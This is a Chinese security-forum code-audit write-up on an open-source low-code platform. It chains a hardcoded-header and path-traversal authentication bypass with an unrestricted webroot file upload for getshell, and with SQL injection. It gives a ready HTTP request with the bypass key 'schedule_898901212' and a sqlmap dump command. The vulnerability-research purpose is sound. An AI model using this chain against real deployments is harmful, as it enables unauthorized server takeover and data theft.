奇安信攻防社区-某低代码平台代码审计分析

某低代码平台代码审计分析

某次项目中遇到的系统，发现还是开源的，于是就下下来小审一下，从权限绕过到getshell，还是比较有收获。

一、权限绕过
======

发现很多接口没登录就不能访问，于是直接定位到sessionfilter

第一种：
----

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-265c7540db3ca2aab9f1289b1aaba65e3f125ce4.png)

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-be1741cf907f0d877a66f5a80f3372d7ce1bfe21.png)

所以很简单，我们加上这个头就能绕过了

第二种：
----

```java
            //请求路径
            String uri = request.getRequestURI();

//校验是否放行
            if (noFiltersMatcher.matches(uri)) {
                doFilter = false;
            }
```

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-b23ba53120b0ff7d4bf4bf352ee26e402a95c9bb.png)

类似shiro的权限绕过，可以利用`static/../je/document/file`绕过

二、文件上传审计
========

根据关键字匹配很容易可以定位到两个接口

```shell
/je/document/file
/je/disk/file
还有其他的，逻辑都差不多
```

就直接看`/je/document/file`

前面都是一些参数处理，可以略过，值得关注的是这里有两个参数bucket和dir是可控的

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-a1bd0fb730e3e02940198600f0543f9b83698339.png)

直接往下看到

```java
 //保存文件并持久化业务数据
 List fileBos = documentBusService.saveFile(fileUploadFiles, userId, metadata, bucket, dir);
```

跟进进入到接口的实现方法

```java
public List saveFile(List fileUploadFiles, String userId, JSONObject metadata, String bucket, String dir) {
        Calendar now = Calendar.getInstance();
        List files = new ArrayList();
        Iterator var8 = fileUploadFiles.iterator();

while(true) {
            FileUpload fileUpload;
            String fileKey;
            while(true) {
                if (!var8.hasNext()) {
                    return files;
                }

fileUpload = (FileUpload)var8.next();
                fileKey = fileUpload.getFileKey();
                if (StringUtils.isNotBlank(fileKey)) {
                    if (this.selectFileByKey(fileKey) != null) {
                        continue;
                    }
                    break;
                }

fileKey = JEUUID.uuid();
                break;
            }

this.log.warn("{} Upload file start ...", fileKey);
            String fileName = fileUpload.getFileName();
            Long size = fileUpload.getSize();
            String contentType = fileUpload.getContentType();
            this.log.warn("{} File msg: name({}),size({}),type({}),bucket({}).", new Object[]{fileKey, fileName, size, contentType, bucket});
            this.log.warn("{} Start read byte array ...", fileKey);
            long currentTimeMillis = System.currentTimeMillis();
            byte[] bytes = IoUtil.readBytes(fileUpload.getFile());
            this.log.warn("{} Read byte success, cost time: {}.", fileKey, System.currentTimeMillis() - currentTimeMillis);

try {
                Bucket bucketBO = this.fileManager.findBucket(bucket);
                DocumentFileDO fileDO = null;
                DigestEnum digestEnum = null;
                String digestValue = null;
                if (this.fileAutoGenerator == null) {
                    this.fileAutoGenerator = DefaultFileAutoGenerator.getInstance();
                }

if (StringUtils.isBlank(dir) &amp;&amp; this.fileAutoGenerator.checkDigest()) {
                    digestEnum = DigestEnum.getDefault();
                    digestValue = this.fileManager.messageDigest(bytes, digestEnum);
                    this.log.warn("{} Check file digest.", fileKey);
                    fileDO = this.fileDAO.selectFileByDigest(digestEnum, digestValue, bucketBO.getBucket());
                    if (fileDO != null &amp;&amp; !this.fileManager.existFile(fileDO.getFilePath(), fileDO.getBucket())) {
                        fileDO.setDeleted(true);
                        this.fileDAO.update(fileDO);
                        fileDO = null;
                    }
                }

if (fileDO == null) {
                    currentTimeMillis = System.currentTimeMillis();
                    this.log.warn("{} Save file start ...", fileKey);
                    FileSaveDTO fileSaveDTO = this.fileManager.saveFile(fileName, contentType, bytes, bucketBO, dir);
                    this.log.warn("{} Save file success, cost time: {}.", fileKey, System.currentTimeMillis() - currentTimeMillis);
                    fileDO = new DocumentFileDO();
                    BeanUtil.copyProperties(fileSaveDTO, fileDO);
                    String[] splitFolder = fileSaveDTO.getFilePath().split("/");
                    fileDO.setFolder(fileSaveDTO.getFilePath().replaceAll(splitFolder[splitFolder.length - 1], ""));
                    fileDO.setContentType(fileUpload.getContentType());
                    fileDO.setSize(fileUpload.getSize());
                    if (StringUtils.isBlank(dir) &amp;&amp; this.fileAutoGenerator.checkDigest()) {
                        fileDO.setDigestType(digestEnum.getCode());
                        fileDO.setDigestValue(digestValue);
                    }

fileDO.setCreateUser(userId);
                    fileDO.setModifiedUser(userId);
                    this.fileDAO.save(fileDO);
                }

...
....
......
            this.log.warn("{} Upload file end ...", fileKey);
        }
    }
```

方法很长，但基本上都是一些赋值取值的操作，其中会判断dir是否为空，如果为空就直接进入到下一个if，因为fileDO没有被操作过，所以进入到if中

再跟进到FileSaveDTO fileSaveDTO = this.fileManager.saveFile(fileName, contentType, bytes, bucketBO, dir);

```java
public FileSaveDTO saveFile(String fileName, String contentType, byte[] byteArray, Bucket bucket, String dir) {
        ByteArrayInputStream temp = null;

FileSaveDTO var24;
        try {
            if (this.fileAutoGenerator == null) {
                this.fileAutoGenerator = DefaultFileAutoGenerator.getInstance();
            }

FileOperate fileOperate = FileOperateFactory.getInstance(bucket);
            StringBuilder filePath = new StringBuilder();
            String fullName = "";
            if (bucket.getSaveType().equals(SaveTypeEnum.mongodb.getCode())) {
                fullName = fileName;
                filePath.append(String.format("%s/%s", bucket.getBasePath(), fileName));
            } else {
                if (StringUtils.isNotBlank(dir)) {
                    filePath.append(dir);
                } else {
                    filePath.append(this.fileAutoGenerator.pathGenerator(fileName, contentType, byteArray, bucket));
                }

fullName = this.fileAutoGenerator.fileNameGenerator(fileName, contentType, byteArray, bucket);
                filePath.append("/").append(fullName);
            }

String[] splits = fullName.split("\\.");
            String name = splits[0];
            String suffix = splits.length == 1 ? "" : splits[splits.length - 1];
            temp = IoUtil.toStream(byteArray);
            UploadFileDTO dto = fileOperate.uploadFile(filePath.toString(), temp);
            FileSaveDTO fileSaveDTO = new FileSaveDTO();
            if (bucket.getSaveType().equals(SaveTypeEnum.mongodb.getCode())) {
                name = dto.getFilePath().split("/")[1];
            }

fileSaveDTO.setName(name);
            fileSaveDTO.setSuffix(suffix);
            fileSaveDTO.setFullName(fullName);
            fileSaveDTO.setFilePath(dto.getFilePath());
            fileSaveDTO.setFullUrl(dto.getFullUrl());
            fileSaveDTO.setBucket(bucket.getBucket());
            fileSaveDTO.setSaveType(bucket.getSaveType());
            fileSaveDTO.setPermission(bucket.getPermission());
            if (this.fileAutoGenerator.thumbnailGenerator()) {
                InputStream thumbnail = this.thumbnail(byteArray, contentType, suffix);
                if (thumbnail != null) {
                    UploadFileDTO thumbnailDto = fileOperate.uploadFile(filePath.append(".thumbnail").toString(), thumbnail);
                    fileSaveDTO.setThumbnail(thumbnailDto.getFilePath());
                }
            }
```

这里首先将bucket对象传入了一个文件操作的工厂类（FileOperateFactory）中去获取实例，我们跟进，

```java
public static FileOperate getInstance(Bucket bucketBO) {
        try {
            if (INSTANCES.containsKey(bucketBO.getBucket()) &amp;&amp; ((FileOperate)INSTANCES.get(bucketBO.getBucket())).isLastVersion(bucketBO.getModifiedTime())) {
                return (FileOperate)INSTANCES.get(bucketBO.getBucket());
            } else {
                FileOperate fileOperate = buildFileOperate(bucketBO);
                if (fileOperate == null) {
                    throw new Exception("文件工具类实例构建失败!");
                } else {
                    INSTANCES.put(bucketBO.getBucket(), fileOperate);
                    return fileOperate;
                }
            }
        } catch (Exception var2) {
            log.info("FileOperate create fail, {}", JSON.toJSONString(bucketBO));
            throw new DocumentException(var2.getMessage(), DocumentExceptionEnum.DOCUMENT_FILE_OPERATE_INIT, var2);
        }
    }

private static FileOperate buildFileOperate(Bucket bucketBO) throws Exception {
        SaveTypeEnum saveType = SaveTypeEnum.getDefault(bucketBO.getSaveType());
        if (SaveTypeEnum.aliyun == saveType) {
            return new FileOperateOSS(bucketBO.getAccessBucket(), bucketBO.getAccessKey(), bucketBO.getSecretKey(), bucketBO.getUrl(), bucketBO.getPermission(), bucketBO.getBasePath(), bucketBO.getModifiedTime());
        } else if (SaveTypeEnum.DEFAULT == saveType) {
            return new FileOperateLocal(bucketBO.getBasePath(), bucketBO.getModifiedTime());
        } else if (SaveTypeEnum.tencent == saveType) {
            return new FileOperateTencent(bucketBO.getAccessKey(), bucketBO.getSecretKey(), bucketBO.getExt1(), bucketBO.getAccessBucket(), bucketBO.getPermission(), bucketBO.getBasePath(), bucketBO.getModifiedTime(), bucketBO.getUrl());
        } else if (SaveTypeEnum.mongodb == saveType) {
            return new FileOperateMongodb(bucketBO.getBasePath(), bucketBO.getModifiedTime());
        } else {
            String key = "save." + bucketBO.getSaveType();
            String className = props.getProperty(key);
            Class clazz = Class.forName(className);
            Constructor c = clazz.getConstructor(Bucket.class);
            return (FileOperate)c.newInstance(bucketBO);
        }
    }
```

进入到buildFileOperate方法发现会判断bucket对象的saveType类型，跟到枚举类中发现有这几个

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-5215c3a22bde778db7d94a238697af4b1aa8424c.png)

但是这是怎么来的呢，这里我去翻了一下数据库，在je\_document\_bucket表中

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-436a50851aa29fbfa84b397ad8b2d37bcf9e5b7d.png)

我们可以知道，webroot和disk-oss这两个bucket都是对应defalut类型的。

实例化出来后，继续往下走

```java
           StringBuilder filePath = new StringBuilder();
            String fullName = "";
            if (bucket.getSaveType().equals(SaveTypeEnum.mongodb.getCode())) {
                fullName = fileName;
                filePath.append(String.format("%s/%s", bucket.getBasePath(), fileName));
            } else {
                if (StringUtils.isNotBlank(dir)) {
                    filePath.append(dir);
                } else {
                    filePath.append(this.fileAutoGenerator.pathGenerator(fileName, contentType, byteArray, bucket));
                }

fullName = this.fileAutoGenerator.fileNameGenerator(fileName, contentType, byteArray, bucket);
                filePath.append("/").append(fullName);
            }

....
        ....
            if (this.fileAutoGenerator.thumbnailGenerator()) {
                InputStream thumbnail = this.thumbnail(byteArray, contentType, suffix);
                if (thumbnail != null) {
                    UploadFileDTO thumbnailDto = fileOperate.uploadFile(filePath.append(".thumbnail").toString(), thumbnail);
```

这里就是根据不同情况获取文件路径和文件名，我们后面需要的时候再过来看

我们直接跟进到`UploadFileDTO dto = fileOperate.uploadFile(filePath.toString(), temp);`

这里就会发现，有四个实现类，而我们要getshell，当然是需要选择走本地上传。

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-4bad4f8aaf1bb4e958b25df8e231757ca3fdb418.png)  
所以我们就得控制fileOperate的类型，而这个正是之前FileOperateFactory实例化出来的对象，

跟进工厂类

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-338343f5ca2a672782b21af6493f2c3478898b5b.png)  
会走到local

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-9bd0636786c4c8a8123eaac1e0f57baf20455c0f.png)

而disk-oss是default

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-d0a7c9ecf5900ce8406f4613e41f01615d709db9.png)  
所以会走到local的upload file

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-2ecf74903ba6827dd8994a8dd6fcfda1d4ea3410.png)  
当bucket类型为default，就会是

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-66392801a1accbab160400ce964739392e5b5e35.png)

所以就知道，我们控制bucket参数值为webroot

接着，能够上传文件了，但是还不知道路径，所以返回到之前的方法

```java
StringBuilder filePath = new StringBuilder();
            String fullName = "";
            if (bucket.getSaveType().equals(SaveTypeEnum.mongodb.getCode())) {
                fullName = fileName;
                filePath.append(String.format("%s/%s", bucket.getBasePath(), fileName));
            } else {
                if (StringUtils.isNotBlank(dir)) {
                    filePath.append(dir);
                } else {
                    filePath.append(this.fileAutoGenerator.pathGenerator(fileName, contentType, byteArray, bucket));
                }

fullName = this.fileAutoGenerator.fileNameGenerator(fileName, contentType, byteArray, bucket);
                filePath.append("/").append(fullName);
            }
```

这里dir可控，可以直接随便取个名字，就是一个新文件夹，也可以留空，会在document下生成一个/year/yy-mm/格式的文件夹

可以先看看在数据库中结果

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-07823f3a4633b3f43ace1f630d38cbfc5991ed6e.png)

然后最麻烦的点就是这个文件名，fileNameGenerator这个方法会用uuid再生成一个文件名，并没有沿用前面生成的fileKey，所以在最终页面回显的时候，看到的fileKey并不是文件名

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-c5aacb5832eb45d0ba33bd7cb2f7c09c2a0ee0ab.png)

三、SQL注入
=======

后面去翻了自带的sql文件，发现在je\_document\_file表中会记录存储上传的文件，包括完整路径，正好之前审计的时候看代码也发现了有很多地方的sql语句都是直接拼接的，可以直接注入，这里我随便找了一个

```java
POST /rbac/im/accessToTeanantInfo HTTP/1.1
Host: xxxxx
Accept-Language: zh-CN,zh;q=0.9
internalRequestKey: schedule_898901212
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: je-local-lang=zh_CN; JSESSIONID=155BD0DA95609068A00408ACF1326C63
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

tenantId=1
```

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-2aac57a14330cc62cf183ae7654e6f0fac608cf5.png)

利用sqlmap直接跑可以出数据

```java
sqlmap -r 2.txt --level 3 -D "jepaas" -T "je_document_file" --dump --fresh-queries
```

--fresh-queries是因为sqlmap可能有缓存，数据不刷新，导致找不到文件名。

四、要注意的几个点
=========

一、数据库不一定就是默认的jepass，有可能会变

二、文件上传的bucket不同会影响是否能够在页面访问，比如webroot可以解析到页面上，disk-oss则不行，如下图。并且我尝试了他系统的一些文件也是如此，当然不排除是这个站的一些配置的原因。但是如果碰到这种配置的话就不能够利用disk那个上传接口，因为默认写死了就是disk-oss

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-c412fa799b2a328be9e0c3ad10803cdd710900f0.png)

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-955245996c5473e3420ef9d4150573f28c441bd0.png)

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-7e5bc623633e19c94cf83cd525b0a96657ac3e13.png)

所以我个人还是建议采用document这个接口，因为这个接口的bucket是可控的

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-e1d2e6452faa97b11dfcc5eedd5fd23488089e3d.png)

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-11c108725c92d898bef0da081704da79451e7b31.png)

时间都是能对上的

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-67f993d9214523ac431a6adc68e9fdeb14a7c0e8.png)

三、访问文件也需要带上那个`internalRequestKey: schedule\_898901212`header头去访问，不然过不了认证

发表于 2024-05-22 09:00:00
阅读 ( 2079 )
分类：代码审计

4 条评论

清风不待我少年 2024-05-22 12:16

太酷啦

xiaobaibai 2024-05-22 16:06

学到了，另外大佬的idea icon、字体配置啥的方便分享一下吗

Qiu_ 回复 xiaobaibai

主题是Material Theme UI，字体是Comic Mono

2024-05-28 11:39
回复

maomao 2024-05-22 18:31

卧槽神